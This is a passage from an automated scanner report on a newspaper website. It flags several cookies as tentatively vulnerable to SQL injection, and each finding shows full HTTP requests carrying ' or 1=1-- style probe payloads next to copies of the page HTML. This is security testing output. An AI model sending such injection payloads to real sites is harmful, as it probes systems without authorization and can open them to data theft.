Date: Wed, 08 Dec 2010 01:53:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=BDF2H33MBVKVCCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginter
...[SNIP]...

1.134. http://www.contracostatimes.com/ci_16774009 [UserType cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16774009

Issue detail

The UserType cookie appears to be vulnerable to SQL injection attacks. The payloads 40344553'%20or%201%3d1--%20 and 40344553'%20or%201%3d2--%20 were each submitted in the UserType cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16774009?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser40344553'%20or%201%3d1--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:49:19 GMT
Set-Cookie: JSESSIONID=NS005IFELOM2GCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 63148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill
soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractiv
...[SNIP]...

Request 2

GET /ci_16774009?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser40344553'%20or%201%3d2--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=NMULBYIBRRB1KCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 63148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill
soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https
...[SNIP]...

1.135. http://www.contracostatimes.com/ci_16790597 [EMETA_COOKIE_CHECK_MNGI cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16790597

Issue detail

The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16790597?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:50:23 GMT
Set-Cookie: JSESSIONID=BRKODQ0IV0H2WCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65063

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other people&#27;s mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/
...[SNIP]...

Request 2

GET /ci_16790597?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=IYWUEKQC00XJOCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65063

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other people&#27;s mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/
...[SNIP]...

1.136. http://www.contracostatimes.com/ci_16790963 [fPage cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16790963

Issue detail

The fPage cookie appears to be vulnerable to SQL injection attacks. The payloads 12191704'%20or%201%3d1--%20 and 12191704'%20or%201%3d2--%20 were each submitted in the fPage cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d1--%20; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:48:56 GMT
Set-Cookie: JSESSIONID=R1ZWT2OVQZ3YSCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er
...[SNIP]...

Request 2

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d2--%20; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=LXC0MP2SC3AUMCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatime
...[SNIP]...

1.137. http://www.contracostatimes.com/ci_16790963 [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16790963

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 43929352'%20or%201%3d1--%20 and 43929352'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d1--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:48:22 GMT
Set-Cookie: JSESSIONID=QT32PNOLQWOWACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er
...[SNIP]...

Request 2

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d2--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=OK40RG3ZKVTH0CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
